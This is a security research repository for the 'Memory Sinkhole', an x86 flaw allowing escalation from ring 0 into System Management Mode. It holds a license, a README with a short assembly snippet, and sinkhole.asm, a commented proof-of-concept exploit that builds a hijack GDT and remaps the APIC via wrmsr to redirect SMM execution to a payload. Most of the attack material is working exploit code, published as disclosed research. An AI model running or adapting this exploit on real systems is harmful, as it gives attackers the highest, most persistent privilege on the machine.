├── LICENSE
├── README.md
├── sinkhole.asm
├── us-15-Domas-TheMemorySinkhole-wp.pdf
└── us-15-Domas-TheMemorySinkhole.pdf


/LICENSE:
--------------------------------------------------------------------------------
 1 | Copyright (c) 2015, Battelle Memorial Institute
 2 | All rights reserved.
 3 | 
 4 | Redistribution and use in source and binary forms, with or without
 5 | modification, are permitted provided that the following conditions are met:
 6 | 
 7 | * Redistributions of source code must retain the above copyright notice, this
 8 |   list of conditions and the following disclaimer.
 9 | 
10 | * Redistributions in binary form must reproduce the above copyright notice,
11 |   this list of conditions and the following disclaimer in the documentation
12 |   and/or other materials provided with the distribution.
13 | 
14 | * Neither the name of the copyright holder nor the names of its
15 |   contributors may be used to endorse or promote products derived from
16 |   this software without specific prior written permission.
17 | 
18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
28 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | ## The Memory Sinkhole
 2 | : An x86 design flaw allowing ring -2 privilege escalation.
 3 | 
 4 | ### Overview
 5 | 
 6 | The memory sinkhole is a design flaw in x86 processors that allows code to
 7 | escalate privileges into ring -2 (System Management Mode).
 8 | 
 9 | ```
10 | wbinvd
11 | mov dword [0x10014], 0xffcf9aff
12 | mov dword [0x10010], 0x9fa2ffff
13 | 
14 | mov eax, 0x1f5ff900
15 | mov edx, 0
16 | mov ecx, 0x1b
17 | wrmsr
18 | 
19 | jmp $
20 | ```
21 | 
22 | The proof of concept [APIC overlay attack](sinkhole.asm) illustrates one
23 | approach for using the flaw to elevate privileges.
24 | 
25 | ### References
26 | 
27 | The technique is outlined in detail in the [Black Hat
28 | presentation](https://www.youtube.com/watch?v=lR0nh-TdpVg).
29 | 
30 | Slides from the presentation are provided [here](us-15-Domas-TheMemorySinkhole.pdf).
31 | 
32 | The exploit [white paper](us-15-Domas-TheMemorySinkhole-wp.pdf) provides a
33 | technical overview of the flaw and exploitation approach.
34 | 
35 | ### Author
36 | 
37 | The Memory Sinkhole is a research effort from Christopher Domas
38 | ([@xoreaxeaxeax](https://twitter.com/xoreaxeaxeax)).
39 | 


--------------------------------------------------------------------------------
/sinkhole.asm:
--------------------------------------------------------------------------------
 1 | ; memory sinkhole proof of concept
 2 | ; hijack ring -2 execution through the apic overlay attack.
 3 | 
 4 | ; deployed in ring 0
 5 | 
 6 | ; the SMBASE register of the core under attack
 7 | TARGET_SMBASE equ 0x1f5ef800
 8 |  
 9 | ; the location of the attack GDT.
10 | ; this is determined by which register will be read out of the APIC
11 | ; for the GDT base.  the APIC registers at this range are hardwired,
12 | ; and outside of our control; the SMM code will generally be reading 
13 | ; from APIC registers in the 0xb00 range if the SMM handler is page 
14 | ; aligned, or the 0x300 range if the SMM handler is not page aligned. 
15 | ; the register will be 0 if the SMM handler is aligned to a page 
16 | ; boundary, or 0x10000 if it is not.
17 | GDT_ADDRESS equ 0x10000
18 |  
19 | ; the value added to SMBASE by the SMM handler to compute the
20 | ; protected mode far jump offset.  we could eliminate the need for an
21 | ; exact value with a nop sled in the hook.
22 | FJMP_OFFSET equ 0x8097
23 |  
24 | ; the offset of the SMM DSC structure from which the handler loads
25 | ; critical information
26 | DSC_OFFSET equ 0xfb00
27 |  
28 | ; the descriptor value used in the SMM handler’s far jump
29 | DESCRIPTOR_ADDRESS equ 0x10
30 |  
31 | ; MSR number for the APIC location
32 | APIC_BASE_MSR equ 0x1b
33 |  
34 | ; the target memory address to sinkhole
35 | SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)
36 |  
37 | ; we will hijack the default SMM handler and point it to a payload
38 | ; at this physical address.
39 | PAYLOAD_OFFSET equ 0x1000
40 | 
41 | ; compute the desired base address of the CS descriptor in the GDT.
42 | ; this is calculated so that the fjmp performed in SMM is perfectly
43 | ; redirected to the payload hook at PAYLOAD_OFFSET.
44 | CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)
45 |  
46 | ; we target the boot strap processor for hijacking.
47 | APIC_BSP equ 0x100
48 |  
49 | ; the APIC must be activated for the attack to work.
50 | APIC_ACTIVE equ 0x800
51 |  
52 | ;;; begin attack ;;;
53 |  
54 | ; clear the processor caches,
55 | ; to prevent bypassing the memory sinkhole on data fetches
56 | wbinvd
57 |  
58 | ; construct a hijack GDT in memory under our control
59 | ; note: assume writing to identity mapped memory.
60 | ; if non-identity mapped, translate these through the page tables first.
61 | mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4],
62 | 	(CS_BASE&0xff000000) | (0x00cf9a00) | 
63 | 		(CS_BASE&0x00ff0000)>>16
64 | mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0],
65 | 	(CS_BASE&0x0000ffff)<<16 | 0xffff
66 |  
67 | ; remap the APIC to sinkhole SMM’s DSC structure
68 | mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
69 | mov edx, 0
70 | mov ecx, APIC_BASE_MSR
71 | wrmsr
72 |  
73 | ; wait for a periodic SMI to be triggered
74 | jmp $
75 | 


--------------------------------------------------------------------------------
/us-15-Domas-TheMemorySinkhole-wp.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Battelle/sinkhole/c6427cbca2a72c8126ac262b68df978e02bc424f/us-15-Domas-TheMemorySinkhole-wp.pdf


--------------------------------------------------------------------------------
/us-15-Domas-TheMemorySinkhole.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Battelle/sinkhole/c6427cbca2a72c8126ac262b68df978e02bc424f/us-15-Domas-TheMemorySinkhole.pdf


--------------------------------------------------------------------------------